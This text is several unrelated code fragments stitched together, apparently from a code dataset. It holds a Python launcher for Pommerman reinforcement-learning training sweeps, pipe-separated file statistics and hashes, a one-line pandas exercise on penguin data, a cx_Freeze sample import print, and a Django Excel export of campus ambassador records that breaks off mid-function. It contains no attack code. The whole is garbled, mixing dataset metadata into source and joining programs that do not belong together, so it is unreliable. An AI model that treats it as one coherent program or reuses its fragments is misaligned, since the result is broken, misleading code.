# "num-processes": 60, "gamma": 1.0, "batch-size": 102400, "num-mini-batch": 20,
# "num-frames": 2000000000,
# }
# counter = 0
# for learning_rate in [3e-4, 1e-4]:
# for (name, distro) in [
# ("uBnG", "uniformBoundsG"), #50
# ("uBnH", "uniformBoundsH"), #100
# ("genesis", "genesis"),
# ]:
# for numgames in [4]:
# for itemreward in [0, .03, .1]:
# for seed in [1]:
# if itemreward == 0 and name == "genesis":
# continue
# j = {k:v for k,v in job.items()}
# j["state-directory"] = os.path.join(directory, "ffacompetition%d-s100-complex/train" % numgames)
# j["run-name"] = "bsfx-%s-%d" % (name, counter)
# if itemreward:
# j["item-reward"] = itemreward
# j["seed"] = seed
# j["state-directory-distribution"] = distro
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
### These are doing the above but for 100 games. Consequently, we had to apply longer bounds.
# job = {
# "how-train": "simple", "log-interval": 2500, "save-interval": 25,
# "log-dir": os.path.join(directory, "logs-bsfx100"), "save-dir": os.path.join(directory, "models"),
# "config": "PommeFFACompetition-v0", "model-str": "PommeCNNPolicySmall", "use-gae": "",
# "num-processes": 60, "gamma": 1.0, "batch-size": 102400, "num-mini-batch": 20,
# "num-frames": 2000000000,
# }
# counter = 0
# for learning_rate in [3e-4]:
# for (name, distro) in [
# ("uBnG", "uniformBoundsG"), #50
# ("uBnJ", "uniformBoundsJ"), #75
# ("uBnH", "uniformBoundsH"), #100
# ("uBnI", "uniformBoundsI"), #150
# ("genesis", "genesis"),
# ]:
# for numgames in [100]:
# for itemreward in [0, .1]:
# for seed in [1, 2]:
# if itemreward == 0 and name == "genesis":
# continue
# j = {k:v for k,v in job.items()}
# j["state-directory"] = os.path.join(directory, "ffacompetition%d-s100-complex/train" % numgames)
# j["run-name"] = "100bds-%s-%d" % (name, counter)
# if itemreward:
# j["item-reward"] = itemreward
# j["seed"] = seed
# j["state-directory-distribution"] = distro
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
### This is using the 2nd place agent as the expert. They were there to the end, but received a -1 at the end.
# job = {
# "how-train": "simple", "log-interval": 2500, "save-interval": 25,
# "log-dir": os.path.join(directory, "logs-bsfxusp"), "save-dir": os.path.join(directory, "models"),
# "config": "PommeFFACompetition-v0", "model-str": "PommeCNNPolicySmall", "use-gae": "",
# "num-processes": 60, "gamma": 1.0, "batch-size": 102400, "num-mini-batch": 20,
# "num-frames": 2000000000, "use-second-place": ""
# }
# counter = 0
# for learning_rate in [1e-4, 3e-4]:
# for (name, distro) in [
# ("uBnG", "uniformBoundsG"), #50
# ("uBnK", "uniformBoundsK"), #40
# ]:
# for numgames in [4]:
# for itemreward in [0, .1]:
# for seed in [1, 2]:
# j = {k:v for k,v in job.items()}
# j["state-directory"] = os.path.join(directory, "ffacompetition%d-s100-complex-2nd/train" % numgames)
# j["run-name"] = "bsfxusp-%s-%d" % (name, counter)
# if itemreward:
# j["item-reward"] = itemreward
# j["seed"] = seed
# j["state-directory-distribution"] = distro
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
### Same as two above with 100 games, but here we use an epoch change of 85.
# job = {
# "how-train": "simple", "log-interval": 2500, "save-interval": 25,
# "log-dir": os.path.join(directory, "logs-bsfx100"), "save-dir": os.path.join(directory, "models"),
# "config": "PommeFFACompetition-v0", "model-str": "PommeCNNPolicySmall", "use-gae": "",
# "num-processes": 60, "gamma": 1.0, "batch-size": 102400, "num-mini-batch": 20,
# "num-frames": 2000000000,
# }
# counter = 0
# for learning_rate in [3e-4]:
# for (name, distro) in [
# ("uBnL", "uniformBoundsL"), #85
# ]:
# for numgames in [100]:
# for itemreward in [0, .1]:
# for seed in [1, 2]:
# j = {k:v for k,v in job.items()}
# j["state-directory"] = os.path.join(directory, "ffacompetition%d-s100-complex/train" % numgames)
# j["run-name"] = "100bds-%s-%d" % (name, counter)
# if itemreward:
# j["item-reward"] = itemreward
# j["seed"] = seed
# j["state-directory-distribution"] = distro
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
### Use the rebuilt replays! Fucking lol.
# Um, these all failed before for a mysterious reason that I'm not aware of..
# Doing it again.
# job = {
# "how-train": "simple", "log-interval": 7500, "save-interval": 25,
# "log-dir": os.path.join(directory, "logs-fxrp"), "save-dir": os.path.join(directory, "models"),
# "config": "PommeFFACompetition-v0", "model-str": "PommeCNNPolicySmall", "use-gae": "",
# "num-processes": 60, "gamma": 1.0, "batch-size": 102400, "num-mini-batch": 20,
# "num-frames": 2000000000,
# }
# counter = 0
# for learning_rate in [3e-4]:
# for (name, distro) in [
# ("uBnG", "uniformBoundsG"), #50
# ("uBnJ", "uniformBoundsJ"), #75
# ("uBnL", "uniformBoundsL"), #85
# ("uBnH", "uniformBoundsH"), #100
# ("genesis", "genesis"),
# ]:
# for numgames in [110, 5]:
# if numgames == 5 and name in ["uBnH", "uBnL"]:
# # Skip distributions we know are too slow.
# continue
# for itemreward in [0, .1]:
# for seed in [1, 2]:
# for use_second_place in [True, False]:
# if numgames == 110:
# runng = 100
# elif numgames == 5:
# runng = 4
# j = {k:v for k,v in job.items()}
# subdir = "fx-ffacompetition%d-s100-complex" % numgames
# log_dir = os.path.join(directory, "logs-fx%d" % runng)
# save_dir = os.path.join(directory, "models-fx%d" % runng)
# run_name = "fx%d-%s-%d" % (runng, name, counter)
# if use_second_place:
# if numgames == 110:
# # Skip because we didn't set up usp for 110
# counter += 1
# continue
# j["use-second-place"] = ""
# subdir += "-2nd"
# log_dir += "usp"
# save_dir += "usp"
# run_name += "usp"
# j["state-directory"] = os.path.join(
# directory,
# "pomplays",
# subdir,
# "train")
# j["log-dir"] = log_dir
# j["save-dir"] = save_dir
# j["run-name"] = run_name
# if itemreward:
# j["item-reward"] = itemreward
# j["seed"] = seed
# j["state-directory-distribution"] = distro
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
### Doing different seeds on the G models...
# job = {
# "how-train": "simple", "log-interval": 7500, "save-interval": 25,
# "log-dir": os.path.join(directory, "logs-fxrp"), "save-dir": os.path.join(directory, "models"),
# "config": "PommeFFACompetition-v0", "model-str": "PommeCNNPolicySmall", "use-gae": "",
# "num-processes": 60, "gamma": 1.0, "batch-size": 102400, "num-mini-batch": 20,
# "num-frames": 2000000000,
# }
# counter = 0
# for learning_rate in [3e-4]:
# for (name, distro) in [
# # ("uBnG", "uniformBoundsG"), #50
# ("uniform", "uniform"), #50
# ]:
# for numgames in [5]:
# for itemreward in [0, .1]:
# for seed in [3, 4, 5]:
# for use_second_place in [True, False]:
# runng = 4
# j = {k:v for k,v in job.items()}
# subdir = "fx-ffacompetition%d-s100-complex" % numgames
# log_dir = os.path.join(directory, "logs-fx%d" % runng)
# save_dir = os.path.join(directory, "models-fx%d" % runng)
# run_name = "2fx%d-%s-%d" % (runng, name, counter)
# if use_second_place:
# j["use-second-place"] = ""
# subdir += "-2nd"
# log_dir += "usp"
# save_dir += "usp"
# run_name += "usp"
# j["state-directory"] = os.path.join(
# directory,
# "pomplays",
# subdir,
# "train")
# j["log-dir"] = log_dir
# j["save-dir"] = save_dir
# j["run-name"] = run_name
# if itemreward:
# j["item-reward"] = itemreward
# j["seed"] = seed
# j["state-directory-distribution"] = distro
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
### Doing different seeds on the 100 L models...
# job = {
# "how-train": "simple", "log-interval": 7500, "save-interval": 25,
# "log-dir": os.path.join(directory, "logs-fxrp"), "save-dir": os.path.join(directory, "models"),
# "config": "PommeFFACompetition-v0", "model-str": "PommeCNNPolicySmall", "use-gae": "",
# "num-processes": 60, "gamma": 1.0, "batch-size": 102400, "num-mini-batch": 20,
# "num-frames": 2000000000,
# }
# counter = 0
# for learning_rate in [3e-4]:
# for (name, distro) in [
# # ("uBnL", "uniformBoundsL"), #85
# ("uniform", "uniform"), #85
# ]:
# for numgames in [110]:
# for itemreward in [0, .1]:
# for seed in [3, 4, 5]:
# runng = 100
# j = {k:v for k,v in job.items()}
# subdir = "fx-ffacompetition%d-s100-complex" % numgames
# log_dir = os.path.join(directory, "logs-fx%d" % runng)
# save_dir = os.path.join(directory, "models-fx%d" % runng)
# run_name = "2fx%d-%s-%d" % (runng, name, counter)
# j["state-directory"] = os.path.join(
# directory,
# "pomplays",
# subdir,
# "train")
# j["log-dir"] = log_dir
# j["save-dir"] = save_dir
# j["run-name"] = run_name
# if itemreward:
# j["item-reward"] = itemreward
# j["seed"] = seed
# j["state-directory-distribution"] = distro
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
# Dagger, the 102400 ones didn't work because we ran out of memory... I'm going to have to restart these to be have more time...
# job = {
# "num-processes": 60, "how-train": "dagger", "num-episodes-dagger": 10, "log-interval": 25,
# "save-interval": 25, "num-steps-eval": 100,
# "log-dir": os.path.join(directory, "dagger", "logs"),
# "save-dir": os.path.join(directory, "dagger", "models"),
# "config": "PommeFFACompetition-v0", "model-str": "PommeCNNPolicySmall",
# "expert-prob": 0.5,
# }
# counter = 0
# for learning_rate in [3e-3, 1e-3, 3e-4]:
# for minibatch_size in [5120]:
# for maxaggr_size in [102400, 51200]:
# for numgames in [110, 5]:
# for gamma in [.995, 1.]:
# for seed in [1, 2]:
# j = {k:v for k,v in job.items()}
# subdir = "fx-ffacompetition%d-s100-complex" % numgames
# run_name = "dagfx%d-%d" % (numgames, counter)
# j["state-directory"] = os.path.join(
# directory,
# "pomplays",
# subdir,
# "train")
# j["run-name"] = run_name
# j["seed"] = seed
# j["gamma"] = gamma
# j["minibatch-size"] = minibatch_size
# j["max-aggregate-agent-states"] = maxaggr_size
# j["seed"] = seed
# j["state-directory-distribution"] = "genesis"
# j["lr"] = learning_rate
# train_dagger_job(j, j["run-name"], is_fb=True, partition="uninterrupted")
# counter += 1
### Dagger again.
# job = {
# "num-processes": 60, "how-train": "dagger", "num-episodes-dagger": 10, "log-interval": 75,
# "save-interval": 75, "num-steps-eval": 100,
# "log-dir": os.path.join(directory, "dagger", "logs"),
# "save-dir": os.path.join(directory, "dagger", "models"),
# "config": "PommeFFACompetition-v0", "model-str": "PommeCNNPolicySmall",
# "expert-prob": 0.5,
# }
# counter = 0
# for learning_rate in [3e-3, 1e-3]:
# for minibatch_size in [5120]:
# for maxaggr_size in [51200]:
# for numgames in [110, 5]:
# for gamma in [.995, 1.]:
# for seed in [3, 4, 5, 6]:
# for item_reward in [0., 0.1]:
# j = {k:v for k,v in job.items()}
# subdir = "fx-ffacompetition%d-s100-complex" % numgames
# run_name = "dag2fx%d-%d" % (numgames, counter)
# j["state-directory"] = os.path.join(
# directory,
# "pomplays",
# subdir,
# "train")
# j["run-name"] = run_name
# if item_reward:
# j["item-reward"] = item_reward
# j["seed"] = seed
# j["gamma"] = gamma
# j["minibatch-size"] = minibatch_size
# j["max-aggregate-agent-states"] = maxaggr_size
# j["seed"] = seed
# j["state-directory-distribution"] = "genesis"
# j["lr"] = learning_rate
# train_dagger_job(j, j["run-name"], is_fb=True, partition="uninterrupted")
# counter += 1
### Backselfplay First runs.
# These didn't work. Some hypothesis:
# 1. The agents were dumb at the beginning and so they just learned useless policies that didn't translate
# when they then were introduced to complex agents later on.
# 2. The value loss is way off because it's an unstable and changing policy.
# job = {
# "how-train": "backselfplay", "log-interval": 7500, "save-interval": 100,
# "config": "PommeFFACompetition-v0", "model-str": "PommeCNNPolicySmall", "use-gae": "",
# "num-processes": 60, "gamma": 1.0, "batch-size": 102400, "num-mini-batch": 20,
# "num-frames": 2000000000,
# }
# counter = 0
# for learning_rate in [3e-4, 1e-4]:
# for (name, distro) in [
# ("uBnG", "uniformBoundsG"), #50
# ("uBnJ", "uniformBoundsJ"), #75
# ("uniform", "uniform"),
# ]:
# for numgames in [5]:
# for itemreward in [0, .1]:
# for seed in [1, 2]:
# runng = 4
# j = {k:v for k,v in job.items()}
# subdir = "fx-ffacompetition%d-s100-complex" % numgames
# log_dir = os.path.join(directory, "logs-fx%d-ubp" % runng)
# save_dir = os.path.join(directory, "models-fx%d-ubp" % runng)
# run_name = "bspubp-fx%d-%s-%d" % (runng, name, counter)
# j["use-both-places"] = ""
# j["state-directory"] = os.path.join(
# directory,
# "pomplays",
# subdir,
# "train")
# j["log-dir"] = log_dir
# j["save-dir"] = save_dir
# j["run-name"] = run_name
# if itemreward:
# j["item-reward"] = itemreward
# j["seed"] = seed
# j["state-directory-distribution"] = distro
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
### The above but with already trained policies. Note that we are using a policy that was trained only for the single agent. Will it do ok on the 2nd agent??? Unclear.
### These were pretty fucking dumb because we didn't restart the counts ...
### Start them over with that.
# job = {
# "how-train": "backselfplay", "log-interval": 7500, "save-interval": 100,
# "config": "PommeFFACompetition-v0", "model-str": "PommeCNNPolicySmall", "use-gae": "",
# "num-processes": 60, "gamma": 1.0, "batch-size": 102400, "num-mini-batch": 20,
# "num-frames": 2000000000,
# }
# counter = 0
# for learning_rate in [3e-4, 1e-4]:
# for (name, distro) in [
# ("uBnG", "uniformBoundsG"), #50
# ("uBnJ", "uniformBoundsJ"), #75
# ("uniform", "uniform"),
# ("genesis", "genesis"),
# ]:
# for numgames in [5]:
# for itemreward in [0, .1]:
# for seed in [3]:
# runng = 4
# j = {k:v for k,v in job.items()}
# subdir = "fx-ffacompetition%d-s100-complex" % numgames
# log_dir = os.path.join(directory, "logs-fx%d-ubp" % runng)
# save_dir = os.path.join(directory, "models-fx%d-ubp" % runng)
# run_name = "bspubpld-fx%d-%s-%d" % (runng, name, counter)
# j["use-both-places"] = ""
# j["state-directory"] = os.path.join(
# directory,
# "pomplays",
# subdir,
# "train")
# j["log-dir"] = log_dir
# j["save-dir"] = save_dir
# j["run-name"] = run_name
# if itemreward:
# j["item-reward"] = itemreward
# j["restart-counts"] = ""
# j["saved-paths"] = os.path.join(directory, "models-fx4", "agent0-2fx4-uBnG-3.simple.FFACmp.Small.nc256.lr0.0003.bs102400.ns1707.gam1.0.seed3.gae.uniformBoundsG.itemrew0.100.epoch500.steps51210000.pt")
# else:
# j["restart-counts"] = ""
# j["saved-paths"] = os.path.join(directory, "models-fx4", "agent0-2fx4-uBnG-0.simple.FFACmp.Small.nc256.lr0.0003.bs102400.ns1707.gam1.0.seed3.gae.uniformBoundsG.epoch500.steps51210000.pt")
# j["seed"] = seed
# j["state-directory-distribution"] = distro
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
### Here, we use the adaptive policy for frobackselfplay. We haven't done that in a long time so we try out a few differenta pproaches.
# job = {
# "how-train": "frobackselfplay", "log-interval": 7500, "save-interval": 100,
# "config": "PommeFFACompetition-v0", "model-str": "PommeCNNPolicySmall", "use-gae": "",
# "num-processes": 60, "gamma": 1.0, "batch-size": 102400, "num-mini-batch": 20,
# "num-frames": 2000000000, "use-both-places": "",
# }
# counter = 0
# for learning_rate in [3e-4]:
# for (name, distro) in [
# ("uBnAdptA", "uniformBndAdptA"),
# ("uBnAdptB", "uniformBndAdptB"),
# ("uniform", "uniform"),
# ("genesis", "genesis"),
# ]:
# for itemreward in [0, .1]:
# for seed in [1, 2]:
# for use_saved_path in [False, True]:
# numgames = 5
# runng = 4
# j = {k:v for k,v in job.items()}
# subdir = "fx-ffacompetition%d-s100-complex" % numgames
# log_dir = os.path.join(directory, "logs-fx%d-ubnadpt" % runng)
# save_dir = os.path.join(directory, "models-fx%d-ubnadpt" % runng)
# run_name = "fx%d-%s-%d" % (runng, name, counter)
# j["use-both-places"] = ""
# j["state-directory"] = os.path.join(
# directory,
# "pomplays",
# subdir,
# "train")
# j["log-dir"] = log_dir
# j["save-dir"] = save_dir
# j["run-name"] = run_name
# if itemreward:
# j["item-reward"] = itemreward
# if use_saved_path:
# j["restart-counts"] = ""
# j["saved-paths"] = os.path.join(directory, "models-fx4", "agent0-2fx4-uBnG-3.simple.FFACmp.Small.nc256.lr0.0003.bs102400.ns1707.gam1.0.seed3.gae.uniformBoundsG.itemrew0.100.epoch500.steps51210000.pt")
# elif use_saved_path:
# j["restart-counts"] = ""
# j["saved-paths"] = os.path.join(directory, "models-fx4", "agent0-2fx4-uBnG-0.simple.FFACmp.Small.nc256.lr0.0003.bs102400.ns1707.gam1.0.seed3.gae.uniformBoundsG.epoch500.steps51210000.pt")
# j["seed"] = seed
# j["state-directory-distribution"] = distro
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
### Backplay but with adaptive simple training.
# job = {
# "how-train": "simple", "log-interval": 7500, "save-interval": 25,
# "config": "PommeFFACompetition-v0", "model-str": "PommeCNNPolicySmall", "use-gae": "",
# "num-processes": 60, "gamma": 1.0, "batch-size": 102400, "num-mini-batch": 20,
# "num-frames": 2000000000,
# }
# counter = 0
# for learning_rate in [3e-4]:
# for (name, distro) in [
# ("uBnAdptA", "uniformBndAdptA"),
# ("uBnAdptB", "uniformBndAdptB"),
# ]:
# for numgames in [5]:
# for itemreward in [0, .1]:
# for seed in [1, 2]:
# for use_second_place in [True, False]:
# runng = 4
# j = {k:v for k,v in job.items()}
# subdir = "fx-ffacompetition%d-s100-complex" % numgames
# log_dir = os.path.join(directory, "logs-fx%d" % runng)
# save_dir = os.path.join(directory, "models-fx%d-adpt" % runng)
# run_name = "%s-%d" % (name, counter)
# if use_second_place:
# j["use-second-place"] = ""
# subdir += "-2nd"
# log_dir += "usp"
# save_dir += "usp"
# run_name += "usp"
# j["state-directory"] = os.path.join(
# directory,
# "pomplays",
# subdir,
# "train")
# j["log-dir"] = log_dir
# j["save-dir"] = save_dir
# j["run-name"] = run_name
# if itemreward:
# j["item-reward"] = itemreward
# j["seed"] = seed
# j["state-directory-distribution"] = distro
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
### Like the above re adaptive but we are:
### 1. Busting out the per-agent success rates to be over only those games and not all games.
### 2. Restricting each thread to be roughyl onyl a single game. Two games are overrepresented.
### 3. Also doing mixed frozen+complex half the time.
# job = {
# "how-train": "frobackselfplay", "log-interval": 7500, "save-interval": 100,
# "config": "PommeFFACompetition-v0", "model-str": "PommeCNNPolicySmall", "use-gae": "",
# "num-processes": 64, "gamma": 1.0, "batch-size": 102400, "num-mini-batch": 20,
# "num-frames": 2000000000, "use-both-places": "",
# }
# counter = 0
# for learning_rate in [3e-4]:
# for (name, distro) in [
# ("uBnAdptA", "uniformBndAdptA"),
# ("uBnAdptB", "uniformBndAdptB"),
# ("uniform", "uniform"),
# ("genesis", "genesis"),
# ]:
# for itemreward in [0, .1]:
# for seed in [1]:
# for use_saved_path in [False, True]:
# for mix_frozen_complex in [False, True]:
# numgames = 5
# runng = 4
# j = {k:v for k,v in job.items()}
# subdir = "fx-ffacompetition%d-s100-complex" % numgames
# log_dir = os.path.join(directory, "logs-fx%d-ubnadpt" % runng)
# save_dir = os.path.join(directory, "models-fx%d-ubnadpt" % runng)
# run_name = "2fx%d-%s-%d" % (runng, name, counter)
# if mix_frozen_complex:
# j["mix-frozen-complex"] = ""
# j["state-directory"] = os.path.join(
# directory,
# "pomplays",
# subdir,
# "train")
# j["log-dir"] = log_dir
# j["save-dir"] = save_dir
# j["run-name"] = run_name
# if itemreward:
# j["item-reward"] = itemreward
# if use_saved_path:
# j["restart-counts"] = ""
# j["saved-paths"] = os.path.join(directory, "models-fx4", "agent0-2fx4-uBnG-3.simple.FFACmp.Small.nc256.lr0.0003.bs102400.ns1707.gam1.0.seed3.gae.uniformBoundsG.itemrew0.100.epoch500.steps51210000.pt")
# elif use_saved_path:
# j["restart-counts"] = ""
# j["saved-paths"] = os.path.join(directory, "models-fx4", "agent0-2fx4-uBnG-0.simple.FFACmp.Small.nc256.lr0.0003.bs102400.ns1707.gam1.0.seed3.gae.uniformBoundsG.epoch500.steps51210000.pt")
# j["seed"] = seed
# j["state-directory-distribution"] = distro
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
### Backplay like above with adaptive simple training, but here we lower the threshold to 0.5 instead of 0.6.
# job = {
# "how-train": "simple", "log-interval": 7500, "save-interval": 25,
# "config": "PommeFFACompetition-v0", "model-str": "PommeCNNPolicySmall", "use-gae": "",
# "num-processes": 60, "gamma": 1.0, "batch-size": 102400, "num-mini-batch": 20,
# "num-frames": 2000000000, 'adapt-threshold': .5
# }
# counter = 0
# for learning_rate in [3e-4]:
# for itemreward in [0, .1]:
# for numgames in [5]:
# for (name, distro) in [
# ("uBnAdptA", "uniformBndAdptA"),
# ]:
# for seed in [1, 2]:
# for use_second_place in [True, False]:
# for adapt_threshold in [.5, .6]:
# runng = 4
# j = {k:v for k,v in job.items()}
# j["adapt-threshold"] = adapt_threshold
# subdir = "fx-ffacompetition%d-s100-complex" % numgames
# log_dir = os.path.join(directory, "logs-fx%d" % runng)
# save_dir = os.path.join(directory, "models-fx%d-adpt" % runng)
# run_name = "%s-%d" % (name, counter)
# if use_second_place:
# j["use-second-place"] = ""
# subdir += "-2nd"
# log_dir += "usp"
# save_dir += "usp"
# run_name += "usp"
# j["state-directory"] = os.path.join(
# directory,
# "pomplays",
# subdir,
# "train")
# j["log-dir"] = log_dir
# j["save-dir"] = save_dir
# j["run-name"] = run_name
# if itemreward:
# j["item-reward"] = itemreward
# j["seed"] = seed
# j["state-directory-distribution"] = distro
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
### Running everything for 100 over for 5 seeds across uniform, genesis, and uBnL for the ICLR paper.
# job = {
# "how-train": "simple", "log-interval": 7500, "save-interval": 25,
# "log-dir": os.path.join(directory, "logs-fxrp"), "save-dir": os.path.join(directory, "models"),
# "config": "PommeFFACompetition-v0", "model-str": "PommeCNNPolicySmall", "use-gae": "",
# "num-processes": 60, "gamma": 1.0, "batch-size": 102400, "num-mini-batch": 20,
# "num-frames": 2000000000,
# }
# counter = 0
# for learning_rate in [3e-4]:
# for (name, distro) in [
# ("uBnL", "uniformBoundsL"), #85
# ("unfm", "uniform"), #85
# ("gnss", "genesis")
# ]:
# for numgames in [110]:
# for itemreward in [0, .1]:
# for seed in [1, 2, 3, 4, 5]:
# runng = 100
# j = {k:v for k,v in job.items()}
# subdir = "fx-ffacompetition%d-s100-complex" % numgames
# log_dir = os.path.join(directory, "logs-fx%d" % runng)
# save_dir = os.path.join(directory, "models-fx%d" % runng)
# run_name = "iclr%d-2fx%d-%s-%d" % (seed, runng, name, counter)
# j["state-directory"] = os.path.join(
# directory,
# "pomplays",
# subdir,
# "train")
# j["log-dir"] = log_dir
# j["save-dir"] = save_dir
# j["run-name"] = run_name
# if itemreward:
# j["item-reward"] = itemreward
# j["seed"] = seed
# j["state-directory-distribution"] = distro
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
### Running everything for 4 over for 5 seeds across uniform, genesis, and uBnG for the ICLR paper.
### Additionally running use_second_place as well.
### There are 3*2*5*2 = 60 jobs here.
job = {
"how-train": "simple", "log-interval": 7500, "save-interval": 25,
"log-dir": os.path.join(directory, "logs-fxrp"), "save-dir": os.path.join(directory, "models"),
"config": "PommeFFACompetition-v0", "model-str": "PommeCNNPolicySmall", "use-gae": "",
"num-processes": 60, "gamma": 1.0, "batch-size": 102400, "num-mini-batch": 20,
"num-frames": 2000000000,
}
counter = 0
for learning_rate in [3e-4]:
for (name, distro) in [
("uBnG", "uniformBoundsG"), #50
("unfm", "uniform"),
("gnss", "genesis")
]:
for numgames in [5]:
for itemreward in [0, .1]:
for seed in [1, 2, 3, 4, 5]:
for use_second_place in [True, False]:
runng = 4
j = {k:v for k,v in job.items()}
subdir = "fx-ffacompetition%d-s100-complex-both" % numgames
log_dir = os.path.join(directory, "logs-fx%d" % runng)
save_dir = os.path.join(directory, "models-fx%d" % runng)
run_name = "iclr%d-2fx%d-%s-%d" % (seed, runng, name, counter)
if use_second_place:
j["use-second-place"] = ""
log_dir += "usp"
save_dir += "usp"
run_name += "usp"
j["state-directory"] = os.path.join(
directory,
"pomplays",
subdir,
"train")
j["log-dir"] = log_dir
j["save-dir"] = save_dir
j["run-name"] = run_name
if itemreward:
j["item-reward"] = itemreward
j["seed"] = seed
j["state-directory-distribution"] = distro
j["lr"] = learning_rate
train_ppo_job(j, j["run-name"], is_fb=True)
counter += 1
| 50.254882
| 245
| 0.545837
| 16,941
| 146,694
| 4.682545
| 0.049761
| 0.02259
| 0.026725
| 0.048861
| 0.898988
| 0.892949
| 0.888298
| 0.886836
| 0.878894
| 0.874242
| 0
| 0.057471
| 0.268852
| 146,694
| 2,918
| 246
| 50.272104
| 0.682141
| 0.912805
| 0
| 0.343949
| 0
| 0
| 0.187412
| 0.023565
| 0
| 0
| 0
| 0.000343
| 0
| 1
| 0.012739
| false
| 0
| 0.025478
| 0
| 0.038217
| 0.012739
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b23ef4e76c8e78b49870d7bb359008a37b2e54d2
| 158
|
py
|
Python
|
Python/Topics/Summarizing numeric columns/Mean penguin/main.py
|
drtierney/hyperskill-problems
|
b74da993f0ac7bcff1cbd5d89a3a1b06b05f33e0
|
[
"MIT"
] | 5
|
2020-08-29T15:15:31.000Z
|
2022-03-01T18:22:34.000Z
|
Python/Topics/Summarizing numeric columns/Mean penguin/main.py
|
drtierney/hyperskill-problems
|
b74da993f0ac7bcff1cbd5d89a3a1b06b05f33e0
|
[
"MIT"
] | null | null | null |
Python/Topics/Summarizing numeric columns/Mean penguin/main.py
|
drtierney/hyperskill-problems
|
b74da993f0ac7bcff1cbd5d89a3a1b06b05f33e0
|
[
"MIT"
] | 1
|
2020-12-02T11:13:14.000Z
|
2020-12-02T11:13:14.000Z
|
#your code here. The DataFrame is already loaded as penguins_example.
print(penguins_example.bill_length_mm.mean() / penguins_example.bill_depth_mm.mean())
| 39.5
| 85
| 0.816456
| 24
| 158
| 5.083333
| 0.708333
| 0.368852
| 0.311475
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.094937
| 158
| 3
| 86
| 52.666667
| 0.853147
| 0.43038
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
b29bca61993c5a08196105dba4dc72a7cc0cd76d
| 34
|
py
|
Python
|
cx_Freeze/samples/relimport/pkg1/pkg2/sub5.py
|
lexa/cx_Freeze
|
f1f35d19e8e7e821733f86b4da7814c40be3bfd9
|
[
"PSF-2.0"
] | 358
|
2020-07-02T13:00:02.000Z
|
2022-03-29T10:03:57.000Z
|
cx_Freeze/samples/relimport/pkg1/pkg2/sub5.py
|
lexa/cx_Freeze
|
f1f35d19e8e7e821733f86b4da7814c40be3bfd9
|
[
"PSF-2.0"
] | 372
|
2020-07-02T20:47:57.000Z
|
2022-03-31T19:35:05.000Z
|
cx_Freeze/samples/relimport/pkg1/pkg2/sub5.py
|
lexa/cx_Freeze
|
f1f35d19e8e7e821733f86b4da7814c40be3bfd9
|
[
"PSF-2.0"
] | 78
|
2020-07-09T14:24:03.000Z
|
2022-03-22T19:06:52.000Z
|
print("importing pkg1.pkg2.sub5")
| 17
| 33
| 0.764706
| 5
| 34
| 5.2
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.09375
| 0.058824
| 34
| 1
| 34
| 34
| 0.71875
| 0
| 0
| 0
| 0
| 0
| 0.705882
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
|
0
| 8
|
a2e1e8a7eb38d309de72d001cd94394ea0e9c358
| 9,167
|
py
|
Python
|
pcradmin/excels.py
|
abhi20161997/Apogee-2017
|
e4ae1b379bd5111a3bd7d3399d081dda897a8566
|
[
"BSD-3-Clause"
] | null | null | null |
pcradmin/excels.py
|
abhi20161997/Apogee-2017
|
e4ae1b379bd5111a3bd7d3399d081dda897a8566
|
[
"BSD-3-Clause"
] | null | null | null |
pcradmin/excels.py
|
abhi20161997/Apogee-2017
|
e4ae1b379bd5111a3bd7d3399d081dda897a8566
|
[
"BSD-3-Clause"
] | null | null | null |
from django.http import HttpResponse
from .views import deepgetattr
from portal.models import CampusAmbassador
from registration.models import Participant
from time import gmtime, strftime
import xlsxwriter
try:
import cStringIO as StringIO
except ImportError:
import StringIO
def ambassador_excel(request, **kwargs):
entries = CampusAmbassador.objects.filter(**kwargs).order_by('id')
output = StringIO.StringIO()
workbook = xlsxwriter.Workbook(output)
worksheet = workbook.add_worksheet('new-spreadsheet')
date_format = workbook.add_format({'num_format': 'mmmm d yyyy'})
worksheet.write(0, 0, "Generated:")
